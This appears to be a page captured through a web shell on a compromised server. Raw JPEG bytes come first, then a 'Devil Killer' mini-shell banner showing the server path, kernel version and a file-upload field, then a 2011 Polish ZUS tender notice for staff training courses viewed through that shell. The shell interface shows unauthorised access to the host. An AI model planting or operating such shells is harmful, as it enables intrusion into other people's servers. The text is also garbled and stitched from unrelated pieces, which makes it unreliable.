JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111110/375680-N-2011.html

<p class="kh_header"><b>Biłgoraj: Wykonanie usługi kształcenia w formie szkolenia dla pracowników Oddziału ZUS w Biłgoraju</b><br>
<b>Numer ogłoszenia: 375680 - 2011; data zamieszczenia: 10.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju , ul. Kościuszki 103, 23-400 Biłgoraj, woj. lubelskie, tel. 084 6881200, 6881209, faks 084 6866974.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi kształcenia w formie szkolenia dla pracowników Oddziału ZUS w Biłgoraju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest kompleksowa organizacja wraz z przeprowadzeniem trzech rodzajów szkoleń dla pracowników Oddziału ZUS w Biłgoraju tj.:
1)Część I - Techniki  obsługi klientów z uwzględnieniem specyfiki klienta Zakładu Ubezpieczeń Społecznych.
2)Część II - Język migowy I stopnia dla pracowników Sali Obsługi Klientów w ZUS.
3)Część III - Asertywność i komunikacja interpersonalna.
2.Zamawiający dopuszcza składanie ofert częściowych wg rozwiązania określonego w pkt 1. Wykonawca może złożyć ofertę na dowolną ilość wydzielonych części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony  w zakresie każdej z części jeżeli Wykonawca oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony w zakresie każdej z części jeżeli Wykonawca/y:
a)oświadczy że spełnia w/w warunek. 
b)Wykaże/ą wykonanie usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 2 usług organizacji szkoleń odpowiadających swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniu dokumentów (referencji) potwierdzających, że usługi te zostały wykonane należycie. 
Zamawiający uzna, że wykonawca posiada wiedzę i doświadczenie w zakresie oferty na każdą z 3 części i na wszystkie razem  jeżeli wykonawca wykaże w powyższym okresie poprzez złożony wykaz usług i potwierdzające to referencje lub inne dokumenty należyte zrealizowanie 2 umów na usługę kompleksowej organizacji szkolenia (wraz z zapewnieniem pomieszczeń szkoleniowych wyposażonych w środki audiowizualne, zakwaterowaniem oraz wyżywieniem) w zakresie rodzajowo podobnego jednego z 3 tematów stanowiących przedmiot zamówienia gdzie w ramach każdego zamówienia (zrealizowanej umowy) była przeszkolona co najmniej jedna grupa licząca min. 10 osób a szkolenie tej grupy odbywało się przez okres co najmniej 2 dni.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony  w zakresie każdej z części jeżeli Wykonawca oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony w zakresie każdej z części jeżeli Wykonawca:
a)	oświadczy że spełnia w/w warunek. 
b)	Wykaże/ą że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony  w zakresie każdej z części jeżeli Wykonawca oświadczy że spełnia w/w warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty  
2) Program szkolenia 
3) Pełnomocnictwo - w przypadku reprezentacji przez pełnomocnika 
4) Pełnomocnictwo ustanawiające lidera - w przypadku oferty składanej przez wykonawców ubiegających się wspólnie o zamówienie (konsorcjum)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany istotnych postanowień zawartej umowy nie mogą dotyczyć treści oferty na podstawie której dokonano wyboru wykonawcy z zastrzeżeniem ust. 2.
2.	Zmiana umowy w przypadku wystąpienia którejkolwiek z sytuacji określonych w ust. 2 wymaga każdorazowo zgody zamawiającego i wykonawcy i może być dokonana wyłącznie w formie pisemnego aneksu podpisanego przez obie strony.
3.	Dopuszcza się poniższe zmiany istotnych postanowień zawartej umowy tj.: 
1)	W przypadku uzasadnionej przeszkody w zrealizowaniu szkolenia w miejscu zaproponowanym w ofercie dopuszcza się jego zmianę przy spełnieniu wszystkich warunków określonych w siwz.
2)	W przypadku uzasadnionej przeszkody w zrealizowaniu szkolenia w terminie określonym w harmonogramie szkoleń dopuszcza się jego zmianę na inny pod warunkiem, że wykonawca zgłosi to zamawiającemu nie później niż na 5 dni przed planowanym terminem szkolenia. Szkolenie po zmianie terminu musi się zakończyć najpóźniej w ostatnim dniu realizacji zawartej  umowy.
3)	W przypadku siły wyższej np. klęski żywiołowej uniemożliwiającej prawidłowe wykonanie lub wykonanie w terminie przedmiotu umowy zgodnie ze SIWZ dopuszcza się przesuniecie np. terminu wykonania  przedmiotu zamówienia o czas niezbędny do należytego jego wykonania, nie dłużej jednak niż o okres trwania tych okoliczności. W takim przypadku wykonawca musi niezwłocznie na piśmie przedstawić i udowodnić zaistnienie powyższych okoliczności. W takim przypadku żadna ze stron nie ponosi odpowiedzialności za szkodę poniesioną przez drugą stronę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział Zakładu  Ubezpieczeń  Społecznych w Biłgoraju,
Wieloosobowe Stanowisko Zamówień Publicznych
ul. Kościuszki  103, 23-400 Biłgoraj.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 11:00, miejsce: Sala obsługi klienta w okienku INFORMACJA OGÓLNA - dziennik podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.12.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Osobami uprawnionymi do porozumiewania się z wykonawcami są:
W sprawach dotyczących przedmiotu zamówienia:
- Joanna Kurzyp - Naczelnik Wydziału Spraw Pracowniczych, tel. (84) 688 12 28 
- Monika Bednarz - Inspektor Wydziału Spraw Pracowniczych, tel. (84) 688 13 20

W sprawach proceduralnych: 
- Dariusz Cios - Specjalista Wieloosobowego Stanowiska Zamówień Publicznych, 
tel. (84) 688 12 02, 
- Sabina Nizio - Inspektor Wieloosobowego Stanowiska Zamówień Publicznych, 
tel. (84) 688 12 02,
2.	Osoby uprawnione przez Zamawiającego do porozumiewania się z Wykonawcami udzielają informacji w godz. 8:00 do 14:00 w dni robocze z wyjątkiem sobót i dni ustawowo wolnych od pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Techniki  obsługi klientów z uwzględnieniem specyfiki klienta Zakładu Ubezpieczeń Społecznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kod CPV: 80.50.00.00-9 Usługi szkoleniowe
2.	Wykonawca zobowiązany jest do organizacji 2-dniowego (16 godzin dydaktycznych, 1 godzina dydaktyczna = 45 min.) szkolenia dla czterech grup szkoleniowych po 13 osób od godz.9:00 do 17:00.
3.	Wykonawca w ramach realizacji przedmiotu zamówienia określonego w części I zapewni:
1)	przeprowadzenie szkolenia w dni robocze od poniedziałku do piątku 
2)	szczegółowy program szkolenia uwzględniający minimum programowe, 
3)	materiały szkoleniowe dla każdego uczestnika szkolenia w formie co najmniej papierowej w języku polskim,
4)	trenera/ów prowadzącego/ych szkolenie posiadającego/ych odpowiednie kwalifikacje i doświadczenie
5)	szkolenie w formie wykładu i ćwiczeń w języku polskim,
6)	salę szkoleniową odpowiednią do przeprowadzania szkoleń, optymalną dla grupy 13 osób, wyposażoną w niezbędne środki audiowizualne tj.  laptop, rzutnik, tablica typu flipchart oraz różnokolorowe piszące mazaki),
7)	1 nocleg dla trenera/ów i uczestników każdej grupy szkoleniowej w miejscu w którym będzie realizowane szkolenie w pokojach 1, 2, 3 osobowych wyposażonych w pełny węzeł sanitarny, 
8)	wyżywienie w miejscu zakwaterowania dla trenera/ów i uczestników każdej grupy szkolenia:
a)	dwudaniowy obiad i kolacja 1 dnia szkolenia
b)	śniadanie i dwudaniowy obiad 2 dnia szkolenia 
c)	w każdym dniu szkolenia dwu 15 min. przerw kawowych ( kawa, herbata oraz słodki poczęstunek)
d)	w trakcie szkolenia na sali wykładowej wodę mineralną gazowaną i niegazowaną,
9)	środek transportu dla uczestników na szkolenie (z siedziby O/ZUS w Biłgoraju, ul. Kościuszki 103) i ze szkolenia (do siedziby O/ZUS w Biłgoraju, ul. Kościuszki 103)   
10)	ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników szkolenia 
11)	miejsce organizacji szkolenia w miejscowości oddalonej nie więcej niż 150 km od siedziby zamawiającego
12)	po zakończeniu szkolenia certyfikaty/zaświadczenia dla wszystkich uczestników szkolenia,
4.	Wymagane minimum programowe szkolenia:
a)	Kształtowanie wizerunku firmy
b)	Uwarunkowania dobrej obsługi klientów 
c)	Zasady poprawnego komunikowania się z klientem 
d)	Radzenie sobie z trudnym klientem 
e)	Style komunikowania się - typologia klienta 
f)	Obsługa klienta niepełnosprawnego
g)	 Obsługa klienta przez telefon.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Język migowy I stopnia dla pracowników Sali Obsługi Klientów w ZUS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kod CPV: 80.51.00.00-2 Usługi szkolenia specjalistycznego
2.	Wykonawca zobowiązany jest do organizacji 5-dniowego (40 godzin dydaktycznych, 1 godzina dydaktyczna = 45 min.) szkolenia dla 7 pracowników Sali Obsługi Klientów od godz.9:00 do 17:00. 
3.	Wykonawca w ramach realizacji przedmiotu zamówienia określonego w części II zapewni:
1)	przeprowadzenie szkolenia w dni robocze od poniedziałku do piątku 
2)	szczegółowy program szkolenia,  
3)	materiały szkoleniowe dla każdego uczestnika szkolenia w formie co najmniej papierowej w języku polskim
4)	trenera/ów prowadzącego/ych szkolenie posiadającego/ych odpowiednie kwalifikacje i doświadczenie
5)	szkolenie w formie wykładu i ćwiczeń w języku polskim,
6)	niezbędne środki audiowizualne do zapewnianej przez Zamawiającego sali szkoleniowej tj. laptop, rzutnik, tablicę typu flipchart oraz różnokolorowe piszące mazaki,
7)	noclegi dla trenera/ów prowadzącego/cych szkolenie w miejscu w którym będzie realizowane szkolenie w pokojach 1, 2, 3 osobowych wyposażonych w pełny węzeł sanitarny, 
8)	wyżywienie tj.: 
a)	dla trenera/ów  - pełne wyżywienie w każdym dniu szkolenia: śniadanie, dwudaniowy obiad (catering w miejsce szkolenia), kolacja  
b)	dla uczestników szkolenia - w każdym dniu szkolenia dwudaniowy obiad (catering w miejsce szkolenia) 
c)	w każdym dniu szkolenia dwu 15 min. przerw kawowych ( kawa, herbata oraz słodki poczęstunek), 
d)	w trakcie szkolenia na sali wykładowej wodę mineralną gazowaną i niegazowaną,
9)	miejsce organizacji szkolenia w miejscowości oddalonej nie więcej niż 150 km od siedziby zamawiającego
10)	po zakończeniu szkolenia egzamin sprawdzający przeprowadzony przez trenera/ów wraz z wydaniem certyfikatu/zaświadczenia dla wszystkich uczestników szkolenia,
4.	Salę szkoleniową w miejscu szkolenia ( Inspektorat ZUS w Zamościu, ul. Kiepury 2)  zapewnia zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Asertywność i komunikacja interpersonalna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kod CPV: 80.50.00.00-9 Usługi szkoleniowe
2.	Wykonawca zobowiązany jest do organizacji 2-dniowego (16 godzin dydaktycznych, 1 godzina dydaktyczna = 45 min.) szkolenia dla dwóch grup szkoleniowych po 10 osób od godz.9:00 do 17:00.
3.	Wykonawca w ramach realizacji przedmiotu zamówienia określonego w części III zapewni:
1)	przeprowadzenie szkolenia w dni robocze od poniedziałku do piątku
2)	szczegółowy program szkolenia uwzględniający minimum programowe, 
3)	materiały szkoleniowe dla każdego uczestnika szkolenia w formie co najmniej papierowej
4)	trenera/ów prowadzącego/ych szkolenie posiadającego/ych odpowiednie kwalifikacje i doświadczenie 
5)	szkolenie w formie wykładu i ćwiczeń w języku polskim,
6)	salę szkoleniową odpowiednią do przeprowadzania szkoleń, optymalną dla grupy 10 osób, wyposażoną w niezbędne środki audiowizualne tj.  laptop, rzutnik, tablica typu flipchart oraz różnokolorowe piszące mazaki),
7)	1 nocleg dla trenera/ów i uczestników każdej grupy szkolenia w miejscowości w której będzie realizowane szkolenie,
8)	wyżywienie dla trenera/ów i uczestników każdej grupy szkolenia tj:
a)	dwudaniowy obiad i kolacja 1 dnia szkolenia; 
b)	śniadanie i dwudaniowy obiad 2 dnia szkolenia 
c)	w każdym dniu szkolenia dwu 15 min. przerw kawowych (kawa, herbata oraz słodki poczęstunek) 
d)	w trakcie szkolenia na sali wykładowej wodę mineralną gazowaną i niegazowaną,
